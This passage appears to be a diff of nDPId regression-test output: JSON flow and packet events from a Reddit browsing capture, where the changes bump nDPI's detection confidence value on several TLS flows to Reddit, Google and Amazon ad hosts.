-01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -153,73 +153,73 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="} -00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 